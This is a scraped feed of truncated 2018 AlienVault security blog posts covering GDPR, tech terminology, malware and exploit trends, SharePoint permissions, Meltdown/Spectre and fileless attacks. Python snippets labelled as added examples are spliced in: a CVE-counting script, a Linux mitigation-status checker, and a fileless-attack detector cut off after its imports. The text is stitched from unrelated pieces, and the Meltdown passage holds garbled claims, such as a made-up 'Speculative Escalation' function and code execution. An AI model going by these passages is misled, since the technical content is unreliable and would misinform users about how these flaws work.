prescribed in the GDPR, which becomes effective in May. Cybersecurity has now gone very mainstream and become very serious. Now is a good time to review whether your organization has stayed on track with the regulation’s milestones. Please also note that the next milestone is March 1st. Many of us in the InfoSec community anticipated that this new era of cybersecurity regulation was on the way. However, now is not the time for any “I told you so” smugness. Remember, it is our job to guide organizations in how to meet the requirements of these new regulations. Remember, if you are not the CISO, then you are probably responsible for making the CISO’s job easier. Let your expertise lead
(Published 2018-01-26T14:00:00+00:00; http://feeds.feedblitz.com/~/520404214/0/alienvault-blogs~NY-State-Department-of-Financial-Services-New-Cybersecurity-Regulation-%e2%80%93-CISO-Attestation-Due-Feb; www.secnews.physaphae.fr/article.php?IdArticle=460880; tags: Guideline)

AlienVault Blog: When Bad Language Happens To Good Systems

In my last blog, I wrote about how words are created and then become mainstream over time, and how that time is longer for normal words and shorter for words used to describe things in tech. But it’s not always straightforward, nor does it always land in the correct place. To illustrate, I give you “on premise” versus “on premises”, a battle that has happened at every company that’s ventured into the Cloud (which is a whole other language discussion we’ll have some other time). In 2013, Brian Madden fired the first shot of the linguistic resistance to the term “on premise”. And then, after much discussion, in 2014, he conceded defeat. “I'm saddened that the industry seems to have adopted the grammatically-incorrect term "on premise" in place of the actual term, "on premises" when discussing where servers will live,” he wrote. He goes on to bemoan “VMware, Citrix, and Microsoft all preferring the term "on premise" over "on premises" in their official press releases and technical documents.” He continues: “Or maybe this is the evolution of language. It's shortened, perverted, and flexed to evolve with the times. Fine, let's call it linguistic evolution.” Brian, dude. We can do better. This isn’t evolution; this is people being incapable of finding an online dictionary. The Merriam-Webster Online Dictionary, our dictionary of choice here at AlienVault, is pretty clear on the difference between the two terms.
Premise: (a) a proposition antecedently supposed or proved as a basis of argument or inference; specifically, either of the first two propositions of a syllogism from which the conclusion is drawn; (b) something assumed or taken for granted; presupposition.
Premises: (a) a tract of land with the buildings thereon; (b) a building or part of a building, usually with its appurtenances (such as grounds).
On premises: inside a building or on the area of land that it is on. “Full meals are available at restaurant on premises.” “No smoking on premises.”
Tom at The Networking Nerd, a word geek after my own heart, brings us the etymology: The etymology of these two words is actually linked, as you might expect. Premise is the first to appear in the late 14th century. It traces from the Old French premise which is derived from the Medieval Latin premissa, which are both defined as “a previous proposition from which another fo
(Published 2018-01-25T14:00:00+00:00; http://feeds.feedblitz.com/~/520116080/0/alienvault-blogs~When-Bad-Language-Happens-To-Good-Systems; www.secnews.physaphae.fr/article.php?IdArticle=460289)

AlienVault Blog: Mental Models & Security: Thinking Like a Hacker

Difficult problems are best solved when they are worked backwards. Researchers are great at inverting systems and technologies to illustrate what the system architect would rather have avoided. In other words, it’s not enough to think about all the things that can be done to secure a system; you must also think about all the things that would leave a system insecure. From a defensive point of view, it means not just thinking about how to achieve success, but also how failure would be managed.
2. Confirmation Bias
What someone wishes, they also believe. We see confirmation bias deeply rooted in applications, systems, and even entire businesses. It means that two people with opposing views on a topic can see the same evidence and come away feeling validated by it. It’s why two auditors can assess the same system and arrive at vastly different conclusions as to its adequacy. Confirmation bias is extremely dangerous from a defender’s perspective, because it clouds judgement. This is something hackers take advantage of all the time. People often fall for phishing emails because they believe they are too clever to fall for one, or too insignificant to be targeted. It’s only when it’s too late that reality sets in.
3. Circle of Competence
Most people have a thing they’re really, truly good at. But if you test them on something outside of this area, you’ll find they’re not particularly well-rounded. Worse, they may be ignorant of their own ignorance; you probably know this as the Dunning-Kruge
(Published 2018-01-24T14:00:00+00:00; http://feeds.feedblitz.com/~/519806748/0/alienvault-blogs~Mental-Models-amp-Security-Thinking-Like-a-Hacker; www.secnews.physaphae.fr/article.php?IdArticle=459639; tags: Guideline)

AlienVault Blog: OTX Trends Part 2: Malware

Part 1 focused on the exploits tracked by OTX. This blog will talk about the malware, and Part 3 will discuss trends we’re seeing in threat actors.
Which malware should I be most concerned about?
Most security incidents that a security team will respond to involve malware. We took a look at three sources of malware telemetry to help prioritise popular malware families:
- the malware families AlienVault customers detect the most;
- the malware domains observed most frequently by Cisco’s Umbrella DNS; and
- the malware families with the highest number of individual samples.
Which malware families do our customers detect the most?
The following table describes the malware that we detected most frequently on our customers’ networks in 2017. It represents malware detected by AlienVault as it communicates across a network, so the data is biased towards families for which we have named network detections. That means the table is a good representation of malware that is actively running on networks, though it’s important to also review other statistics on malware that has been blocked from running. The #1 ranked malware, njRat, is particularly popular in the Middle East. It’s a fairly simple .NET backdoor, and YouTube is full of videos showing amateur users how to deploy it. We often see it packed with a seemingly endless supply of custom packers to evade anti-virus. Whilst the vast bulk of njRat users are low-level criminals, it is also frequently used in targeted political attacks in the Middle East. (Image: a YouTube guide for using njRat.) The #2 ranked malware, NetWire, is primarily used by low-end criminals to steal banking details. Again, it is a freely available tool, and it has been abused by targeted attackers too. The top malware we saw for Linux was China ELF DDoS. We saw little malware for Mac, though the adware MacKeeper was popular.
Which malware domains are observed the most frequently?
We matched known malicious domains from AlienVault OTX against Umbrella DNS’s record of the domains most visited by their customers. From that we produced this table of the “most popular malicious domains”: The column
(Published 2018-01-23T14:00:00+00:00; http://feeds.feedblitz.com/~/519532080/0/alienvault-blogs~OTX-Trends-Part-Malware; www.secnews.physaphae.fr/article.php?IdArticle=459640; tags: APT33, Wannacry, APT 33)

AlienVault Blog: SharePoint Security Best Practices

Being conscientious of SharePoint security is simple if you understand the basics. SharePoint is a Microsoft platform designed to integrate with Microsoft Office. Microsoft launched the product in 2001. SharePoint is useful for thousands of organizations worldwide because it facilitates sharing documents on private web servers. SharePoint can be purchased as a separate product to deploy on your own intranet web servers, or you can use SharePoint Online as a component of many Office 365 packages; SharePoint Online is hosted on Microsoft’s own servers. But poorly secured web servers and web applications can make organizations vulnerable to cyber-attack. Some of a company’s documents that are distributed through SharePoint may contain sensitive or proprietary information, and you don’t want them to fall into the hands of attackers, who could be either internal or external to your network! This quick guide will show you how to use and deploy SharePoint in a secure way so your organization can enjoy the convenience and functionality of SharePoint without introducing vulnerabilities to your corporate network.
SharePoint security permission levels
There are various types of permission levels you can grant users in your SharePoint system.
Full Control: These users have all possible SharePoint permissions, and this level is granted to all members of the Owners group by default. Be careful about which users you place in the Owners group or otherwise grant Full Control. The best practice here is to grant this level to a limited number of administrators only.
Edit: This level enables users to add, edit, and delete lists, and to view, add, update, and delete documents and list items. By default, all users in the Members group have this level, so don’t place users in the Members group who only need to view, read, or contribute documents.
Design: Users with this level can create lists and document libraries. They can also make sites look pretty by editing pages and applying themes, style sheets, and borders. No security group is assigned this level automatically, so if you want users who aren’t administrators in your Owners group to be able to make aesthetic changes to your SharePoint site pages, you’ll have to assign this level to another group or to individual users.
Contribute: This is a more limited version of the Edit level. Users with Contribute can add, update, view, and delete documents and list items, but cannot create or delete the lists themselves.
Read: This level should be granted to users who just need to view and download documents, and who may also need to see historical versions of documents.
Restricted Read: These users can view pages and documents, but they can’t see historical versions of documents or user permissions. In most cases where a user only needs to be able to read the documents on a site, this is the best level to grant them.
View Only: These users can view pages, items and documents. They can only download documents that cannot be viewed in their web browser.
Limited Access: This level only grants users access to a specific page or file, as opposed to an entire site. It is assigned automatically by SharePoint when you provide access to one specific item. You can’t directly grant this permi
(Published 2018-01-22T14:00:00+00:00; http://feeds.feedblitz.com/~/519262616/0/alienvault-blogs~SharePoint-Security-Best-Practices; www.secnews.physaphae.fr/article.php?IdArticle=459641)

AlienVault Blog: Things I Hearted this Week – 19th Jan 2018

Dan Klinedinst to pen his thoughts in a thought-provoking post that will probably leave you with more questions than answers.
The 100 Billion Dollar Infosec Question | Dan Klinedinst, Medium
IT Security Spending to reach $96 billion in 2018 | Dark Reading
Putting the bug in bounty
I’m a big fan of bug bounties; I think that they have a lot of benefits. But, as with any emerging service, there will be issues.
One of them is differentiating between bug bounty and security consulting or testing, and that can cause some problems, which John Carroll articulates very well.
BugBounty != Security Consulting | CTU Security
Inside Uber’s $100,000 Payment to a Hacker, and the Fallout | NY Times

Mirai Okiru botnet targets ARC-based IoT devices

For those of you who don't know, ARC (Argonaut RISC Core) processors are the second most widely used processors in the world and can be found in all manner of unassuming connected devices, from car tech to storage, home and mobile devices. The new Mirai variant, known as Mirai Okiru, is going after them, infecting the devices to conscript them into distributed denial of service (DDoS) attacks.
Mirai Okiru botnet targets for first time ever in the history ARC-based IoT devices | Security Affairs
Mirai Okiru is a botnet that's going after ARC-based IoT gadgets | The Inquirer
Mirai Okiru: New DDoS botnet targets ARC-based IoT devices | CSO

Mental Models & Security: Thinking Like a Hacker

Is it weird that I’m including one of my own articles from this week? Is that the equivalent of someone liking their own Facebook posts? I’ve been reading up on mental models a lot lately and thought a lot could be applied to security, or, as is often said, to thinking like a hacker. I listed seven of my favourite models in this Dark Reading contributed article.
Mental Models & Security: Thinking Like a Hacker | Dark Reading

LeakedSource Founder Arrested for Selling 3 Billion Stolen Credentials

Published 2018-01-19. Source: AlienVault Blog, http://feeds.feedblitz.com/~/518651014/0/alienvault-blogs~Things-I-Hearted-this-Week-%e2%80%93-th-Jan

Shakespeare's Netymology

One of the coolest things about editing in the tech space, for a word nerd like me, is that the language is brand-new, ad hoc, and usually made up on the fly by an engineer or security researcher frantically trying to communicate a new idea without saying something like, “and then the thing happens…” The technical term for a word entirely new to the language, describing a previously undescribed event, generated by a subject matter expert in that field, is a protologism. In other fields, like literary criticism, sociology, and politics — places that, frankly, move slower than we do — a word can remain a protologism for years while people debate and consider before finally accepting it, at which point it becomes a neologism. Neologisms are words that have been widely adopted and whose initial source can be pretty readily ascertained. Because technical editors and technical writers are also looking for ways to describe that thing that happens, we tend to be early adopters of protologisms, and we move words along the spectrum to neologisms as fast as we upgrade the technology itself. As Shakespeare has Henry tell Kate in Henry V, “we are the makers of manners.” We also are the greatest generators of new language since Shakespeare (who added something around 2,000 words in a veritable Renaissance for the English language as it existed then).
And because our teams tend to be highly diverse, made up of people from all over the world, the words we generate in tech tend to be words that can be plugged in across languages: they’re not unique to any particular language, and they tend to resist translation. They end up being naturalized, or transliterated, rather than strictly translated. These transliterations are often generated through TAP, or Think-Aloud Protocol, which is another beautiful thing technology processes have given the world (most of us call it “muttering to ourselves”). There’s even a tech-specific word for what this article is about: netymology, the origin and derivation of technical terms. When you’re in the business of creating software that addresses newly developing online threats, the terminology practically generates itself. A quick stroll through AlienVault’s Open Threat Exchange® (OTX™) will show you all kinds of words that have never been defined. And it’s my job to get those into a glossary for you. It works like this: Attacker (not hacker, for the love of all things fluffy) attacks. Researchers discover. Pulse gets written. I read the pulses, identify the “…and then the thing happens” terms, research where along the protologism > neologism spectrum each one falls by seeing if anyone anywhere else is talking about the word and how they are talking about it, create a definition, and drop that into the glossary that then gets used in the documentation. I’m pretty serious about clear, easy-to-understand documentation.
I think that we, who eat and sleep and breathe new technology, owe it to the users who aren’t in the room where the “…and then the thing happens” moments occur, to make those language evolutions as clear as possible, as u

Published 2018-01-18. Source: AlienVault Blog, http://feeds.feedblitz.com/~/518385366/0/alienvault-blogs~Shakespeares-Netymology

OTX Trends Part 1 - Exploits

GitHub.

Executive Summary

Some of the standout findings from our data covering 2017 are:
The most effective exploits quickly proliferate between a number of criminal and nation state groups. Some remain popular for a number of years after their initial discovery.
njRat malware variants were the most prevalent malware we saw persisting on networks.
Of the ten most popular domains associated with malware, four were sinkholed by MalwareTech.
Confirmation of others’ findings of the changing targeted threat landscape: there has been a significant increase in reports on attackers reportedly located in Russia and North Korea, and a significant drop in reports of activity emanating from groups operating from China.

OTX Trends: Exploits

This is the first of a three part series on the trends we identified in 2017:
Part 1 focuses on exploits
Part 2 will talk about the malware of concern and trends
Part 3 will discuss threat actors and patterns

Which exploits should I be most concerned about?

Many thousands of vulnerabilities are assigned a CVE number every year, and many more go unreported. If you’re responsible for an organisation’s security, it’s important to know:
Which ones are the most important to patch quickly?
Which ones are being actively exploited in the wild?
Which exploits are being reported in vendor reports?
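The last of those questions is the measure the ranking below is built on: how many distinct vendor reports reference each CVE. As an added example (not code from the OTX post or its published data), the following Python shows that counting method end to end: extract CVE identifiers from each report, count a CVE once per report no matter how often it is repeated, and rank. The four report snippets are constructed stand-ins, not text from real vendor reports.

```python
"""Rank CVEs by the number of distinct reports that mention them.

Added example, not code from the OTX trends post.  The report snippets are
constructed for illustration and are not real vendor report text.
"""
import re
from collections import defaultdict

# CVE IDs look like CVE-YYYY-NNNN, with four or more digits in the sequence number.
CVE_RE = re.compile(r"\bCVE-(\d{4})-(\d{4,7})\b", re.IGNORECASE)


def extract_cves(text):
    """Return the set of normalised (upper-case) CVE IDs found in one report.

    A set means a report that mentions CVE-2017-0199 five times still counts
    as a single reference, which is what "number of reports" measures.
    """
    return {f"CVE-{year}-{seq}" for year, seq in CVE_RE.findall(text)}


def rank_cves(reports):
    """reports: {report_name: report_text}.

    Returns a list of (cve, report_count, sorted report names), most cited
    first; ties are broken alphabetically by CVE ID so the order is stable.
    """
    cited_by = defaultdict(list)
    for name, text in reports.items():
        for cve in extract_cves(text):
            cited_by[cve].append(name)
    ranked = sorted(cited_by.items(), key=lambda item: (-len(item[1]), item[0]))
    return [(cve, len(names), sorted(names)) for cve, names in ranked]


# Constructed sample reports (not real vendor text).
SAMPLE_REPORTS = {
    "report-A": "Initial access used an RTF lure exploiting CVE-2017-0199 (OLE2Link/HTA).",
    "report-B": "The maldoc abuses cve-2017-0199; later waves switched to CVE-2017-8759.",
    "report-C": "Stage one: CVE-2017-0199. Stage two re-used CVE-2017-0199 in a second document.",
    "report-D": "Lateral movement via SMBv1 exploitation of CVE-2017-0144 (MS17-010).",
}


def print_table(reports):
    """Print the ranking in the same shape as the OTX table: CVE, report count, reports."""
    for cve, count, names in rank_cves(reports):
        print(f"{cve:16s} {count:3d}  {', '.join(names)}")


if __name__ == "__main__":
    print_table(SAMPLE_REPORTS)
```

Feeding it real pulses or report text instead of SAMPLE_REPORTS is a matter of filling the dictionary; the lower-case match in report-B shows why the IDs are normalised before counting.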
The following table shows exploits in order of the number of times they have been referenced in vendor reports on OTX.

[Figure: A CVE-2017-0199 sample used by criminals]

This table comes from a fairly small data set of approximately 80 vendor reports from 2017, but it still provides a number of insights:

Effective exploits proliferate quickly

The #1 ranked exploit, CVE-2017-0199, is extremely popular. It has been used by targeted attackers in locations as diverse as North Korea (FreeMilk), China (Winnti) and Iran (OilRig). It has also been heavily abused by criminal gangs, such as some of those deploying Dridex.

Published 2018-01-16. Source: AlienVault Blog, http://feeds.feedblitz.com/~/517871006/0/alienvault-blogs~OTX-Trends-Part-Exploits

Things I hearted this week: 12th Jan 2018

full report by the ICO (PDF) is worth reading. It goes into a lot of detail around the vulnerabilities, such as the attacker scanning using Nikto and gaining access to a woefully out-of-date WordPress installation that was running its CMS. It also covers how credentials were stored in plaintext and how the attacker was able to access large amounts of personal data. There are many more details in the report, which I highly encourage you to read, but essentially it boils down to an absence of fundamental security controls, no assurance to verify systems were secured, and a lack of monitoring or detection controls in place.
Carphone Warehouse cops £400k fine after hack exposed 3 meeellion folks’ data | The Register
Britain fines Carphone Warehouse 400,000 pounds over data breach | Reuters

Data protection bill amended to protect security researchers

The UK has revealed amendments to its data protection bill to de-criminalise research into whether anonymised data sets are sufficiently anonymous.
This is very good news for researchers who may have been worried they could be prosecuted for demonstrating weaknesses in anonymization.
UK gov updates Data Protection bill to protect security researchers | The Inquirer
UK Data Protection Bill tweaked to protect security researchers | The Register
Data protection bill amended to protect security researchers | The Guardian
Data Protection Bill | Parliament UK (pdf)

Toy firm VTech fined over data breach

VTech, the ‘smart’ toy manufacturer, has been fined $650,000 by the FTC after exposing the data of millions of parents and children. Troy Hunt brought up the issue back in November 2015 and it made for a chilling read. Not only was the website not secure, but the data was not encrypted in transit or at rest. Hopefully, this kind of crackdown on weak ‘smart’ devices will continue until we see some changes. Not that I enjoy seeing companies being fined, but it doesn’t seem like many manufacturers are paying much attention to security.
FTC fines VTech toy firm over data b

Published 2018-01-12. Source: AlienVault Blog, http://feeds.feedblitz.com/~/516975104/0/alienvault-blogs~Things-I-hearted-this-week-th-Jan

Cryptocurrency Isn't Crypto

For the love of all things glittery, you guys, here I am with this lovely platform from which to rant about language development around developing technology and what happens? Bruce freaking Schneier blogs about inappropriate language use around developing technology; specifically, that “Crypto” Is Being Redefined as Cryptocurrencies. I am all aswoon; I’ve been a serious Schneier fan for a really long time. So you can take it to the bank (see what I did there?) when he says, It is a stupid name. Woot! Because it is a stupid name.
And this is precisely the sort of ridiculous media-propelled distortion that leads to really bad language use (no, not that kind of bad language. The other kind of bad language). And if Bruce backs me up, life is good. Turns out, Lorenzo Franceschi-Bicchierai (@lorenzoFB) also agrees with me. As a writer, I try to remind myself every day that words matter. For example, when I write about hackers, I try to keep in mind that the word has a controversial history and can have a certain connotation. (Gosh, where have we heard that rant before?) He goes on to say, But this is not just a matter of pedantic semantics. As Green explained, cryptography is starting to matter more and more in meatspace, where regular people live, people who might not know about revived 1990s tech policy controversies. Think of the legal battle between Apple and FBI, or popular and damaging malware like ransomware, which often use cryptographic functions to lock files. “If people know what ‘crypto’ is, they should know it as a real technology—not as some synonym for Bitcoin,” he said. So if you care about this, please politely correct people who incorrectly use the word “crypto.” Or maybe make fun of it, as Ryan Stortz, a security researcher in New York suggested. In a chat, he joked that he wants to start trolling people by referring to cryptocurrencies as “Block,” short for “blockchain technologies.” Honestly, though, whatever it takes. Our constant ally, the Merriam-Webster Online Dictionary, once again comes to the rescue. If you search “crypto” they let you know that it’s an abbreviation for the noun cryptography. For a word having to do with secrets, "cryptography" has a surprisingly transparent etymology. The word traces back to the Greek roots kryptos, meaning "hidden," and graphein, meaning "to write." "Kryptos" - which in turn traces to the Greek verb kryptein, meaning "to hide" - is a root shared by several English words, including "crypt," "cryptic," and "encrypt." 
"Krypton," the name of a colorless gaseous element used especially in some fluorescent lamps and photography flashes, also comes from "kryptos." The name was chosen because the gas is rare and hard to find. There is literally nothing in the word “crypto” th]]> 2018-01-11T14:00:00+00:00 http://feeds.feedblitz.com/~/516688338/0/alienvault-blogs~Cryptocurrency-Isnt-Crypto www.secnews.physaphae.fr/article.php?IdArticle=458720 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Improve Your Readiness To Defeat Meltdown & Spectre You were just getting back into the swing of things after bringing in the New Year, and it happened. Like a huge firework exploding with a thump that you can feel through your body, the news of Meltdown and Spectre hit the media on January 3, 2018. Since the official disclosure of Meltdown and Spectre, there has been a flurry of news articles, as well as activity by the major processor and operating system vendors, and the community at large, to address these significant flaws. But, just what are these flaws, how are you impacted, and what should you do about them? About Spectre and Meltdown Discovered by researchers that include the Google Project Zero, several academic institutions, and some private companies, Spectre and Meltdown exploit design flaws existing in nearly all processors manufactured since 1995 that enable exfiltration of data within the CPU cache. Without getting into ‘too’ much detail: Meltdown (outlined in CVE-2017-5754) impacts Intel and Apple processors, and exploits the Intel Privilege Escalation and Speculative Escalation processor functions to read any memory on the system and execute code on the system. 
Spectre (CVE-2017-5715, branch target injection, and CVE-2017-5753, bounds check bypass) affects chips manufactured by Intel, Apple, ARM and AMD. It exploits branch prediction and speculative execution to read another user’s data within the same application, or even memory belonging to another process. But, “What is speculative execution and branch prediction?” I hear you ask. The quick explanation is that these are functions designed to increase the performance of the chip by predicting what the application or system needs next. If the prediction is correct, the processed information is immediately available; if it is wrong, the results are discarded, but the speculative work leaves traces in the cache that an attacker can measure. It’s similar in concept to a fast food restaurant that prepares your food before you arrive, so that you don’t have to wait in line while they cook it. Of course, if you want a deeper explanation of the technology and the exploits, you can read the technical papers published on Meltdown and Spectre. A quick summary of the attacks can be seen in the following table, based on information from Daniel Miessler.

Am I At Risk?

More than likely you are at risk, given that the flaws affect nearly every processor manufactured from 1995 through to today. However, both attacks require the attacker to run code on the target system. That code does not need administrative rights; ordinary unprivileged user code is enough, but the need for local execution typically makes these vulnerabilities harder to exploit at scale. Spectre, though, has been demonstrated through a JavaScript-based attack in unpatched browsers (patches for many popular browsers have already been issued, so be sure to update them!).

Are There Any Known Attacks That Use Meltdown or Spectre?

So far, Meltdown and Spectre are not known to have been used to steal data. That said, compromise can be difficult to detect.
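The first thing a practitioner checks after patching is whether the running kernel actually reports the mitigations as active. As an added example (not code from the AlienVault post), the Python below reads the per-issue status files that Linux 4.15 and later expose under /sys/devices/system/cpu/vulnerabilities/; that path and status strings such as "Mitigation: PTI" are the kernel's real interface. The sample directory it builds when that path is absent is constructed, so the script also runs offline and on non-Linux hosts.

```python
"""Report which Meltdown/Spectre mitigations the running Linux kernel says are active.

Added example, not code from the AlienVault post.  Linux 4.15 and later expose one
file per issue under SYSFS_VULN_DIR (meltdown, spectre_v1, spectre_v2, ...), each
holding "Not affected", "Vulnerable", or "Mitigation: <name>".  The sample
directory built below is constructed so the script also runs on hosts without
that interface.
"""
import os
import tempfile

SYSFS_VULN_DIR = "/sys/devices/system/cpu/vulnerabilities"


def read_cpu_vulnerabilities(directory=SYSFS_VULN_DIR):
    """Return {issue_name: status_line} for every regular file in directory ({} if absent)."""
    status = {}
    if not os.path.isdir(directory):
        return status
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as handle:
                status[name] = handle.read().strip()
    return status


def classify(status_line):
    """Map a kernel status line to 'not_affected', 'mitigated' or 'vulnerable'.

    Anything that is not an explicit "Not affected" or "Mitigation: ..." is treated
    as exposed; that includes lines like "Vulnerable: Minimal generic ASM retpoline",
    which the kernel uses for incomplete mitigations.
    """
    if status_line.startswith("Not affected"):
        return "not_affected"
    if status_line.startswith("Mitigation"):
        return "mitigated"
    return "vulnerable"


def unmitigated(directory=SYSFS_VULN_DIR):
    """Sorted names of the issues the kernel still reports as exploitable."""
    return sorted(name for name, line in read_cpu_vulnerabilities(directory).items()
                  if classify(line) == "vulnerable")


def build_sample_dir():
    """Constructed sample of a host patched for Meltdown but not Spectre v2 (not real data)."""
    directory = tempfile.mkdtemp(prefix="cpu-vulns-")
    samples = {
        "meltdown": "Mitigation: PTI",
        "spectre_v1": "Mitigation: __user pointer sanitization",
        "spectre_v2": "Vulnerable",
    }
    for name, line in samples.items():
        with open(os.path.join(directory, name), "w", encoding="utf-8") as handle:
            handle.write(line + "\n")
    return directory


if __name__ == "__main__":
    target = SYSFS_VULN_DIR if os.path.isdir(SYSFS_VULN_DIR) else build_sample_dir()
    print(f"reading {target}")
    for issue, line in read_cpu_vulnerabilities(target).items():
        print(f"  {issue:14s} {classify(line):13s} {line}")
    exposed = unmitigated(target)
    print("ACTION NEEDED:", ", ".join(exposed) if exposed else "none, all reported issues mitigated")
```

Run it on a fleet and the `unmitigated` list is the inventory of hosts that still need kernel, microcode or browser updates; a file that is missing entirely means the kernel predates the interface and is unpatched by definition.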
The AlienVault Labs

Published 2018-01-11. Source: AlienVault Blog, http://feeds.feedblitz.com/~/516579328/0/alienvault-blogs~Improve-Your-Readiness-To-Defeat-Meltdown-amp-Spectre

Top 17 Blogs from '17

It was a great year in blogs for AlienVault! Here are the top blogs from 2017, selected by number of views from all sources. Drumroll please.

Explain Bitcoin to Me by Tristan Johns. It’s an approachable but technical explanation of how Bitcoin works.
MacSpy: OS X RAT as a Service by Peter Ewane. It’s about one of the first malware-as-a-service (MaaS) offerings for OS X.
Configuring Kali Linux on Amazon AWS Cloud for FREE by Irfan Shakeel. If you want to experiment with pentesting without spending money, this blog will show you how.
How Does Whonix Make Kali Linux Anonymous & How to Prevent It? by Irfan Shakeel. Learn what Whonix is and how it works, how it can be used to go incognito while using Kali Linux, and how to prevent folks from doing it in your corporate network.
Ongoing WannaCry Ransomware Spreading Through SMB Vulnerability by AlienVault Labs. The blog details findings on WannaCry as it started in May 2017.
LockCrypt Ransomware Spreading via RDP Brute-Force Attacks by Chris Doman.
Best Advice for a Career in Cyber Security by Ryan Leatherbury. Ryan discusses networking, conferences, blogs, InfoSec on Twitter, hands-on tools, mentors and more!
It’s Only a Hacker if It’s Linus Himself by Laureen Hudson. At AlienVault, we stick to precisely descriptive terms; we have malicious actors, we have security researchers, but unless we have the fortune to be talking about Linus himself, you’ll never see hackers in our documentation.
How the Vote Hacking Was Done at DefCon25 by @notpandapants. From a guest blogger who participated.
The Diebold ExpressPoll 5000 is a piece of election hardware that is compromised to the core, and creates a hacker-friendly platform for large-scale election manipulation on multiple fronts. Interesting blog, but a little scary too.
Red Teamers Can Learn Secrets by Purple Teaming by Haydn Johnson. Great guest blog by a practitioner, teaching us why Red Teamers should “Purple Team it”.
MacronLeaks – A Timeline of Events by Chris Doman. Chris discusses the implications of leaked documents and the 2017 French election.
How to Prepare to Take the OSCP by Blade Soriano. Guest blogge

Published 2018-01-09. Source: AlienVault Blog, http://feeds.feedblitz.com/~/516119472/0/alienvault-blogs~Top-Blogs-from-%e2%80%98

Things I Hearted this Week 5th Jan 2018

Meltdown Attack, the website.
Google Project Zero blog
NCSC’s advice
Replace CPU hardware – legit advice.
Linus Torvalds was not happy, and issued a strongly-worded statement
Mozilla Confirms Web-Based Execution Vector for Meltdown and Spectre Attacks | Bleeping Computer

Facebook and India’s controversial National ID Database

Facebook has clarified that it’s not asking new users in India for their Aadhaar information while signing up for a new Facebook account. Aadhaar is India’s biometric ID system, which links the demographic information of more than a billion Indians with their fingerprints and iris scans and stores it in a centralized government-owned database that both government agencies and private companies can access to authenticate people’s identities. The program has been slammed by critics for enabling surveillance and violating privacy. Facebook said this was a “small test” that the company ran with a limited number of Indian users, and that its goal was to help new users understand how to sign up to Facebook with their real names.
It sounds an awful lot like the “wallet inspector” in the school playground who would also then keep my money safe for me.
Facebook Just Clarified That It Is Not Collecting Data From India's Controversial National ID Database | Buzzfeed
Rs 500, 10 minutes, and you have access to billion Aadhaar details | The Tribune India

Trackmageddon

Two researchers have disclosed problems with hundreds of vulnerable GPS services using open APIs and trivial passwords (123456), resulting in a multitude of privacy issues including direct tracking. Further, many of the vulnerable services have open directories exposing logged data. For some, the vulnerabilities discovered and disclosed by Vangelis Stykas (@evstykas) and Michael Gruhn (@0x6d696368) aren't new. They were disclosed during Kiwicon in 2015 by Lachlan Temple, who demonstrated flaws in a popular car tracking immobilization device.

Published 2018-01-05. Source: AlienVault Blog, http://feeds.feedblitz.com/~/515235074/0/alienvault-blogs~Things-I-Hearted-this-Week-th-Jan

What's More Important, the Red Team or the Blue Team

check this guest blog out. However, it was a trick question! Both are necessary, as pointed out in this reply.

A false question. Fire fighters vs. fire safety inspectors. Both are essential. If the inspector were completely successful then the fire fighter would get bored. Fortunately, complete success is impossible for either. Keeps us all employed. — C J Czelling (@CJCzelling) December 10, 2017

I gave the third option for those unwilling to choose sides. However, given the choice of only one, the majority of people chose Blue Team.
It does make sense: if you only have one or the other, you had better have defenders rather than add more challengers to the bad guys already attacking your company on a regular basis. If you're a small company, you might have only one person, or one person part-time, in the InfoSec role, so when constrained, Blue Team is where you'll invest. Marcus Carey, a noted Blue Teamer, summed it up nicely.

Blue team all the way. Add a dash of red to make it purple. — Marcus (@marcusjcarey) December 10, 2017

The fact that both are necessary was a consistent theme in the replies. There were several very specific comments around Purple teaming. It made me go back and re-read Haydn Johnson's blog on Purple Teaming from early 2017. Haydn makes the excellent point that Red Teamers benefit greatly by using some Blue Team tricks. Blue Teamers tend to know what really works, and the Red Team benefits from learning the Blue Team's defense (security controls, applications, response). Here's a sampling of the Purple Team themed responses:

Teamwork — Nathan (@NathOnSecurity) December 10, 2017

Purple obviously — Travis (@pinedtree) December 10, 2017

While I voted Blue Team, I have to say that I honestly feel as though a mixture of Blue and Red (Purple) is the best for

Published 2018-01-04. Source: AlienVault Blog, http://feeds.feedblitz.com/~/514937126/0/alienvault-blogs~Whats-More-Important-the-Red-Team-or-the-Blue-Team

Fileless Attacks are Driving Up Security Complexity & Costs

If you feel like it’s getting harder and more expensive to protect your company from cyber attacks, you’re not alone. From streamlined startups to global enterprises, organizations in every industry are feeling the crunch as the threats they’re facing rapidly evolve.
The Ponemon Institute’s 2017 State of Endpoint Security Risk report provides a thorough and enlightening overview of what’s happening. Now in its fifth consecutive year, this highly regarded report analyzes survey responses from more than 600 IT and security practitioners located in the United States. This year’s edition highlighted a few startling stats as well as some unsettling trends.

What won’t surprise most IT professionals is that endpoint security risk has increased, due to both the rising number of attacks and the evolution of attack techniques. Also on the rise is the cost of attacks. Based on data collected for the report, the average total hard cost of a successful attack is more than $5 million, including IT and end-user productivity loss, system downtime, theft of information assets, and a variety of other damages. What may be overlooked, however, is that the complexity and day-to-day cost of defending against these attacks is becoming increasingly prohibitive.

Evolving Attack Techniques Drive Higher Day-to-Day Prevention Costs

Attackers are changing their approach based on what’s working. Looking at data for the past 12 months, the Ponemon report found that 54 percent of respondent organizations experienced one or more endpoint attacks that successfully compromised data assets and/or IT infrastructure. Of those successful attacks, 77 percent involved fileless techniques designed to evade detection by abusing legitimate system tools or launching malicious code from memory. Fileless techniques have long been used by sophisticated hacking groups, who typically aim their attacks at high-level targets like governments and large corporations. It was only a matter of time before these techniques were more widely adopted by cyber criminals. Now, because fileless attack techniques are expressly designed to exploit gaps in traditional security solutions, organizations large and small are finding themselves vulnerable.
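Because nothing is written to disk, the signal for the two fileless patterns just described lives in process-creation telemetry rather than in files: which signed system binary ran, what its parent was, and what its command line (or the payload hidden inside an encoded command) asked it to do. As an added example (not code from the post or from the Ponemon report), the Python below applies those heuristics to events shaped like Sysmon Event ID 1 records; the field names Image, ParentImage and CommandLine are Sysmon's, while the four events, the 198.51.100.7 address (TEST-NET-2) and the encoded payload are constructed. The fragment list is illustrative, not a complete rule set.

```python
"""Flag process-creation events that look like fileless attacks.

Added example, not code from the post or from the Ponemon report.  Events are
dicts using Sysmon Event ID 1 field names (Image, ParentImage, CommandLine);
the four sample events and the 198.51.100.7 address (TEST-NET-2) are
constructed.  The heuristics cover the two patterns the text describes:
abuse of legitimate system tools and code launched straight from memory.
"""
import base64
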